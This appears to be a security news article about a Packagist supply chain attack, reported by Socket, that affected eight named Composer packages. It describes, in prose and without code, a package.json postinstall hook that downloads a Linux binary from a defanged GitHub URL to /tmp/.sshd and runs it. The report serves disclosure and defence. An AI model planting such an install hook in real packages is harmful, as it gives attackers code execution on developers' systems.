Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
A coordinated supply chain attack on Packagist infected eight Composer packages with malicious code that executes a Linux binary hosted on GitHub Releases, targeting JavaScript projects alongside PHP dependencies.
A new coordinated supply chain attack campaign has impacted eight packages on Packagist, the main repository for PHP Composer packages, by injecting malicious code designed to download and execute a Linux binary hosted on GitHub Releases. The attack was discovered by application security firm Socket, which reported that the malicious versions have since been removed from the registry.
What makes this campaign particularly notable is its cross-ecosystem approach. Although the affected packages are all Composer packages for PHP, the malicious code was not added to `composer.json`—the expected metadata file for PHP dependencies. Instead, attackers inserted the payload into `package.json`, the metadata file used by JavaScript's npm ecosystem. This placement targets projects that ship JavaScript build tooling alongside PHP code, allowing the malware to evade security scans that focus solely on PHP-specific files.
The attack works by modifying the upstream repositories of the affected packages to include a `postinstall` script in `package.json`. When a developer installs the package, the script automatically downloads a Linux binary from a GitHub Releases URL (`github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f`), saves it to `/tmp/.sshd`, changes permissions using `chmod` to grant execute permissions to all users, and runs it in the background. The binary's name, "gvfsd-network," mimics a legitimate GNOME Virtual File System daemon, likely to avoid suspicion.
The eight affected packages and their compromised versions include: `moritz-sauer-13/silverstripe-cms-theme` (dev-master), `crosiersource/crosierlib-base` (dev-master), `devdojo/wave` (dev-main), `devdojo/genesis` (dev-main), `katanaui/katana` (dev-main), `elitedevsquad/sidecar-laravel` (3.x-dev), `r2luna/brain` (dev-main), and `baskarcm/tzi-chat-ui` (dev-main). Socket's investigation found references to the same payload across 777 files on GitHub, suggesting the campaign may be broader than initially reported. In at least two instances, the payload was added to GitHub workflow files, indicating the attacker was not relying on a single execution mechanism.
The exact nature of the second-stage binary remains unknown, as the GitHub account hosting the repository is no longer available. However, Socket warns that even without the binary, the malicious installer itself is dangerous. "It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background," the firm stated. This attack underscores the growing sophistication of supply chain threats that exploit cross-ecosystem blind spots, where security teams may overlook JavaScript hooks in PHP packages.